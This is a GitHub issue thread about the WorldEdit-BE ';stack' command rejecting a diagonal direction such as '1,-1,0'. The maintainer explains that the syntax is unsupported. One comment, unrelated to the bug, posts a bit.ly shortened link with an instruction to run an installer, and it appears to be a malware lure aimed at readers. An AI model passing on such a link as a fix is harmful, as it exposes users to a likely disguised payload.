### ISSUE TITLE
'0,-1,0' is an invalid direction argument

### ISSUE THREAD

**Issue by gabrieljones** [SIsilicon/WorldEdit-BE#290]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Current behaviour

```
;stack 1 1,-1,0
```
gives
```
'1,-1,0' is an invalid direction argument
```

### Expected behaviour

```
;stack 1 1,-1,0
```

should work

### Minecraft version

1.21.22

### Device and operating system

Windows 10

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by SIsilicon** [comment]
That's now how the stack command works

**Comment by gabrieljones** [comment]
I'm trying to do this: 
https://github.com/EngineHub/WorldEdit/issues/1363
Looks like this capability was added to Java world edit with: 
https://github.com/EngineHub/WorldEdit/pull/1430

**Comment by SIsilicon** [comment]
Well sorry to say this but this is not supported syntax. If you'd like you can make an enhancement post for it
